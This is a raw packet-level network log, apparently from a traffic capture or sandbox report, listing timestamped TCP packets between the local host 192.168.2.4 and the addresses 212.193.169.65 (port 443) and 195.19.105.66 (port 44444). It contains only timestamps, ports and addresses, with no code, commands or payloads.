                                                                                                                                Nov 19, 2024 18:56:31.035475969 CET50001443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:31.036730051 CET50001443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:31.036731005 CET50001443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:31.036765099 CET44350001212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:31.036879063 CET44350001212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:31.036911011 CET44350001212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:31.036932945 CET50001443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:31.036966085 CET50001443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:31.045911074 CET50007443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:31.045934916 CET44350007212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:31.046135902 CET50007443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:31.046822071 CET50007443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:31.046837091 CET44350007212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:31.879652023 CET44350007212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:31.879888058 CET50007443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:31.887478113 CET50007443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:31.887506962 CET44350007212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:31.887744904 CET44350007212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:31.888660908 CET50007443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:31.931344986 CET44350007212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.250771999 CET44350007212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.250839949 CET44350007212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.250897884 CET50007443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:32.310795069 CET5001544444192.168.2.4195.19.105.66
                                                                                                                                Nov 19, 2024 18:56:32.315702915 CET4444450015195.19.105.66192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.315774918 CET5001544444192.168.2.4195.19.105.66
                                                                                                                                Nov 19, 2024 18:56:32.316001892 CET5001544444192.168.2.4195.19.105.66
                                                                                                                                Nov 19, 2024 18:56:32.316087961 CET5001544444192.168.2.4195.19.105.66
                                                                                                                                Nov 19, 2024 18:56:32.316554070 CET50007443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:32.316562891 CET44350007212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.316922903 CET5001544444192.168.2.4195.19.105.66
                                                                                                                                Nov 19, 2024 18:56:32.320880890 CET4444450015195.19.105.66192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.321712971 CET4444450015195.19.105.66192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.330523968 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:32.330545902 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:32.330764055 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:32.331176996 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:32.331192970 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.008419037 CET4444450015195.19.105.66192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.041449070 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.041574001 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.044703960 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.044734001 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.045075893 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.046071053 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.046108961 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.046124935 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.046727896 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.046993971 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.047004938 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.064311981 CET5001544444192.168.2.4195.19.105.66
                                                                                                                                Nov 19, 2024 18:56:33.211076021 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.251373053 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.423501015 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.423558950 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.423669100 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.423722982 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.434662104 CET50018443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.434683084 CET44350018212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.710283041 CET5001544444192.168.2.4195.19.105.66
                                                                                                                                Nov 19, 2024 18:56:33.715300083 CET50027443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.715348959 CET44350027212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.715547085 CET50027443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.715850115 CET4444450015195.19.105.66192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:33.715919018 CET5001544444192.168.2.4195.19.105.66
                                                                                                                                Nov 19, 2024 18:56:33.716293097 CET50027443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:33.716310978 CET44350027212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:34.457914114 CET44350027212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:34.459328890 CET50027443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:34.460829020 CET50027443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:34.460839033 CET44350027212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:34.461157084 CET44350027212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:34.463331938 CET50027443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:34.463331938 CET50027443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:34.463485956 CET44350027212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:34.463519096 CET44350027212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:34.464247942 CET50027443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:34.464247942 CET50027443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:34.492790937 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:34.492841959 CET44350038212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:34.493386030 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:34.493386030 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:34.493432045 CET44350038212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:35.294395924 CET44350038212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:35.294471025 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.296457052 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.296466112 CET44350038212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:35.296797037 CET44350038212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:35.297595978 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.302928925 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.303011894 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.303086996 CET44350038212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:35.303281069 CET44350038212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:35.303328991 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.303335905 CET44350038212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:35.303399086 CET50038443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.345899105 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.345953941 CET44350046212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:35.346026897 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.346781969 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:35.346797943 CET44350046212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:36.145831108 CET44350046212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:36.145942926 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.147238970 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.147247076 CET44350046212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:36.147599936 CET44350046212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:36.148389101 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.149487019 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.149524927 CET44350046212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:36.149735928 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.149758101 CET44350046212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:36.149796963 CET44350046212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:36.149808884 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.149842024 CET50046443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.170864105 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.170893908 CET44350054212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:36.171005964 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.171524048 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:36.171535969 CET44350054212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.187155962 CET44350054212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.187237024 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.188492060 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.188499928 CET44350054212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.188827038 CET44350054212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.189584017 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.190138102 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.190171957 CET44350054212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.190299034 CET44350054212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.190341949 CET44350054212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.190361977 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.190371990 CET44350054212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.190382957 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.190399885 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.190428972 CET50054443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.250469923 CET50062443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.250519037 CET44350062212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:37.250638008 CET50062443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.251101017 CET50062443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:37.251112938 CET44350062212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.022288084 CET44350062212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.022388935 CET50062443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.024012089 CET50062443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.024034977 CET44350062212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.024405003 CET44350062212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.025100946 CET50062443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.030510902 CET50062443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.030539036 CET44350062212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.030595064 CET50062443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.030642033 CET44350062212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.030669928 CET44350062212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.030848980 CET50062443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.030849934 CET50062443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.125117064 CET50071443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.125160933 CET44350071212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.125390053 CET50071443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.126032114 CET50071443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.126046896 CET44350071212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.925710917 CET44350071212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.925808907 CET50071443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.927186966 CET50071443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.927197933 CET44350071212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.927462101 CET44350071212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.928081989 CET50071443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.929374933 CET50071443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.929403067 CET44350071212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.929502964 CET44350071212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.929527044 CET44350071212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:38.929613113 CET50071443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:38.929703951 CET50071443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:39.045114994 CET50081443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:39.045156002 CET44350081212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:39.045289040 CET50081443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:39.045753956 CET50081443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:39.045769930 CET44350081212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:39.879833937 CET44350081212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:39.879973888 CET50081443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:39.881341934 CET50081443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:39.881350040 CET44350081212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:39.881608009 CET44350081212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:39.882461071 CET50081443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:39.882535934 CET50081443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:39.882582903 CET44350081212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:39.882611990 CET44350081212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:39.882702112 CET50081443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:39.882702112 CET50081443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:39.907947063 CET50089443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:39.907963037 CET44350089212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:39.908046007 CET50089443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:39.908554077 CET50089443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:39.908566952 CET44350089212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:40.714493990 CET44350089212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:40.714564085 CET50089443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:40.729618073 CET50089443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:40.729629993 CET44350089212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:40.729904890 CET44350089212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:40.730920076 CET50089443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:40.732094049 CET50089443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:40.732125998 CET44350089212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:40.732153893 CET50089443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:40.732239008 CET44350089212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:40.732270002 CET44350089212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:40.732300997 CET50089443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:40.732348919 CET50089443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:40.901814938 CET50098443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:40.901844025 CET44350098212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:40.901951075 CET50098443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:40.902524948 CET50098443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:40.902535915 CET44350098212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:41.618244886 CET44350098212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:41.618381977 CET50098443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:41.619721889 CET50098443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:41.619738102 CET44350098212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:41.619982004 CET44350098212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:41.620688915 CET50098443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:41.621545076 CET50098443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:41.621573925 CET44350098212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:41.621691942 CET50098443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:41.621695042 CET44350098212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:41.621727943 CET44350098212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:41.621793032 CET50098443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:41.621813059 CET50098443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:41.707458019 CET50103443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:41.707508087 CET44350103212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:41.707786083 CET50103443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:41.708611012 CET50103443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:41.708636045 CET44350103212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:42.443546057 CET44350103212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:42.443620920 CET50103443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:42.444999933 CET50103443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:42.445017099 CET44350103212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:42.445280075 CET44350103212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:42.445898056 CET50103443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:42.446146965 CET50103443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:42.446177006 CET44350103212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:42.446283102 CET44350103212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:42.446331978 CET44350103212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:42.446378946 CET50103443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:42.446480036 CET50103443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:42.453452110 CET50106443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:42.453500986 CET44350106212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:42.453623056 CET50106443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:42.454036951 CET50106443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:42.454049110 CET44350106212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:43.181524992 CET44350106212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:43.181675911 CET50106443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:43.182883978 CET50106443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:43.182894945 CET44350106212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:43.183128119 CET44350106212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:43.184086084 CET50106443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:43.185072899 CET50106443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:43.185096979 CET44350106212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:43.185208082 CET44350106212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:43.185256958 CET44350106212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:43.185308933 CET50106443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:43.185467005 CET50106443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:43.271471024 CET50109443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:43.271514893 CET44350109212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:43.271595955 CET50109443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:43.272105932 CET50109443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:43.272125006 CET44350109212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:44.078733921 CET44350109212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:44.081238985 CET50109443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:44.082684994 CET50109443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:44.082691908 CET44350109212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:44.082971096 CET44350109212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:44.084171057 CET50109443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:44.085338116 CET50109443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:44.085666895 CET50109443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:44.085680008 CET44350109212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:44.085869074 CET44350109212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:44.085903883 CET44350109212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:44.085973978 CET50109443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:44.085973978 CET50109443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:44.159219027 CET50112443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:44.159244061 CET44350112212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:44.159423113 CET50112443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:44.160718918 CET50112443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:44.160732985 CET44350112212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:44.879462004 CET44350112212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:44.879538059 CET50112443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:44.880867958 CET50112443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:44.880872965 CET44350112212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:44.881112099 CET44350112212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:44.881721973 CET50112443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:44.882019043 CET50112443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:44.882044077 CET44350112212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:44.882133961 CET44350112212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:44.882160902 CET44350112212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:44.882257938 CET50112443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:44.882257938 CET50112443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:44.889156103 CET50115443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:44.889192104 CET44350115212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:44.889301062 CET50115443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:44.889700890 CET50115443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:44.889734030 CET44350115212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:45.690321922 CET44350115212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:45.690485001 CET50115443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:45.691801071 CET50115443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:45.691816092 CET44350115212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:45.692666054 CET44350115212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:45.693283081 CET50115443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:45.694504023 CET50115443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:45.694535971 CET44350115212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:45.694653034 CET44350115212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:45.694655895 CET50115443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:45.694693089 CET44350115212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:45.694749117 CET50115443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:45.694864035 CET50115443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:45.726974964 CET50118443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:45.727025986 CET44350118212.193.169.65192.168.2.4
                                                                                                                                Nov 19, 2024 18:56:45.727354050 CET50118443192.168.2.4212.193.169.65
                                                                                                                                Nov 19, 2024 18:56:45.727817059 CET50118443192.168.2.4212.193.169.65
